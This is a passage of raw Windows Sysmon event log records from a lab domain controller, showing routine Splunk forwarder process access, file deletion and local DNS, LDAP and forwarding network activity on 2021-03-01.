Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7095-603D-6688-00000000AD01}8672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.537{05ADC7E1-7095-603D-6688-00000000AD01}8672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.239{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A06D7FEC96C1260E3342F4E6F8D1EE6D,SHA256=3CB119FCFC3261F1CD2CE0E6B20F43EAD54CC7D6C48C0E73C9C1D9886F9A969E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.192{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9D7A113E9D47EE64BABD78BDA492448,SHA256=358AD6ED7A15E730F349B3C72FE4A0B9491A19D778A13C458CC3158C2BCB0571,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.070{05ADC7E1-7094-603D-6588-00000000AD01}55969140C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001696005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:14.286{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60287CB8B16011E350EDBE4A0021EE4F,SHA256=A57DF0F7E2DBD5B560918E4D803F68CED2D080CBFFEAC2997314B174C0EDFEBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:14.255{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08CF630DC0C5FF5C1B1944DCA26B88E1,SHA256=FF794C4C82B61BB4A3C6AF0E94125C0E234A23FCA3BD8E1E9EF365317BECE5F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:15.301{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9DC5A8F27BFCBA572573AF8B6CC95B8,SHA256=896FF40150C9CEFE35596A5FA2FA9789DB776B00CEB817D8EF1B6B5C8AC5ACCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:16.333{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D1B8C539C6342FDD42517476616D75,SHA256=1E4FE00F52D0A13AF4D598206C62DFB49B602A4B2498771F2FEF684A7326CE61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:17.367{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B14E2069C95BE8134EA384FE5D0F55,SHA256=D1AB7822942CC0B4B2BA69F26468F1B4585B907D7821FAA0C629F3D5A561C239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:18.427{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D87E63F9AFF8F014B0B4F4A2EE2C126,SHA256=5ADB579B899890586FA79749FD459C6614E87B7AC2065FA2118D94A8743C3EB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:18.255{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA19C0810C51538B0B79B55246091E1F,SHA256=4EBC9933457E94B918198F96468E78D845C3801219A883EDADB93CB007095ABE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:19.461{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AABA8AC906EEBA763277B502CAB5F679,SHA256=1D009309ACB9DE20E32B31B2F68E904C4BC09FEF34E68CBC7B7A78B646154680,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:10.563{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55139-false10.0.1.12-8000- 23542300x80000000000000001696015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:20.489{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C914642F625832013FD0E57CC44D418C,SHA256=17F0B5F7B3D8FF29BE2CAD590F2DC25431905B62AACD95461F14D8606C73EE71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:20.223{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0DBC160564371978F638B616EA25B9,SHA256=53A72684C66B94D3FA75FB6151D1605DEBBC5D8812C0D37B8AD38CF78E20018B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:11.547{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64525- 23542300x80000000000000001696017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:21.505{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C8C8E1E7E44C808308CF4350001AE53,SHA256=57CBCA01EA3ECF30EDFA15D374F04E79D5ED3BC3CDB4DCFDD8CD8818DD305CC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.562{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local64525- 23542300x80000000000000001696019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:22.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45444EBA42B984C79FE4367BBF406DFE,SHA256=B6DDDE47DF533733E5DF3955115ADB248C99068253A376A5AF8FA537153F6015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:22.520{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8888667225CA5B1D48EBA4A3EED37C9,SHA256=E8388974F0FBA9CFF11D44E334D02F76BFCD0895AF14A2E503369ACCA991F3BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:23.552{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AAEB8BE8A833EFA2E62ADA128500758,SHA256=8BBAC6B13F19F123A53B95CD721C3F50108F32648298C1C60DB3C4133420DA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:24.598{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2796AA763CCEF2A61D60775A0E93EB8C,SHA256=929491D355003BC55EB052272457830D16F8AC28CE2CFF03FD07ED8EA94C2ECE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:16.063{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-974.attackrange.local55141-false8.240.191.254-80http 354300x80000000000000001696022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:16.053{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64823- 354300x80000000000000001696021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:15.578{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55140-false10.0.1.12-8000- 23542300x80000000000000001696025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:25.630{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E84C55873F1E4C672CDC73F0DAAC144,SHA256=74F17A8E8A23AED68ED95BC7FBF34A04357B799BDFABB6A7CD8790297F6015AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:26.663{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7AF25D89006C765350CB11A631C1FAA,SHA256=3A55B406D6CC62BCEAB57E17BDC48A8E1CB20B3B81B28F4C363422F9B64D0F86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:27.692{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=059901A692AAF85CAF8C40EEB3E7AEB9,SHA256=B199C542D4009F99EB272744C58315B90F400FE2C866C734773C6C60EBD73C5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:27.273{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02C6A981758879F14C354D7886AF2784,SHA256=82589DA53ABF0E8E734D1C66C559B5D5197533B12B1C6224961280703320388C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:28.755{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B26BEA5FCE59B3E52F13D875B0E778D,SHA256=CF134D078B903B323159FFCC978A4674C76005D119EB5D76DF53481C1DD3E913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:29.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D947DBCF551CDEC6765D9F8837B593C2,SHA256=A4EF07AEB864BCAD72AAE67492BB0CF2180098BAE7FE75BC5309461A993EECEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:21.391{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55142-false10.0.1.12-8000- 23542300x80000000000000001696030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:29.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF853102C6CE6955DDF8A222BD4312C6,SHA256=462A0EFCEFF6FBE5C4B5EBF2386EB2D6D005AAA855478280FEE78A70D942DE57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:30.817{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8070E32C0EC53969F985F6055119B53D,SHA256=D9DE6DB22C5E58C548B6BEAAA3CE14897EADF93216233B023D28CEA9E92D5048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:31.871{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64EB2AC38E46669B02554016AB720B13,SHA256=151D8970F89646AA6A885CEFA3E3D54E8E9F60A1F6860C2F58487B36F74EC485,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:31.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2D5A523DAEC5B104FA4DE8D9DF44792,SHA256=906C8279387DFFB67F808678EB251F2AF5E4F4ED84790C3188E819B74314CDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:32.911{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A19AB55322C89ABC6745155401AD8E2C,SHA256=A2809517E5E29F6253FF30F15FCD03F98912310B4E3D14A40A82B11F9A65DDEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:24.203{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55143-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000001696037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:24.203{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55143-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000001696036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:32.368{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7F30B92978733151BEFB86D078AF047,SHA256=CEE91B44B5564B10CFFC13B8D18D915A0BCEA0BE34D73806EDAE4EB1FDD14BB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:33.961{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC34DE025F38AF929DA1F9DDD670B590,SHA256=CA77604E639F5AFDC04EF1530A3C8BE869744867FA2B124B300F5E62BE310841,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:33.369{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6975152D5AF9DCE1011883C8907A899D,SHA256=E88714641BDA85BAA5EA7B575A2C14A503A8951716AB82DE558A8B3A6B180F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:34.973{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8989634D8305670431657383F4D153B5,SHA256=B07D6C4ACCB6DEC590C57E4A3F2F473690CDFE78600A175153631E4350CA604F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:26.453{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55144-false10.0.1.12-8000- 23542300x80000000000000001696046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:35.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BEAF03B7614768FEAA80D7ED562B305,SHA256=00DBE14B2418B605E5A1BEA413678422C77202FD546434D7C55D6246F9842FF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:27.452{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local57049- 23542300x80000000000000001696044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:35.145{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01A4F5E1FF61C20774BF65665DAC1D60,SHA256=4F4E1B6D2DE69DD5F8A9BB7E42C6778E558A06FD0BA6A2D496CB7AD1B293AE91,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:28.468{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local57049- 23542300x80000000000000001696048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:37.020{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C999BBF6EFF78E4C11E0EA00F64B83D,SHA256=EFC8FBF3F454D7E715AEF5794BDF158B7F72B46E2C9BEE9B100F1FC55C61EADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:38.036{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 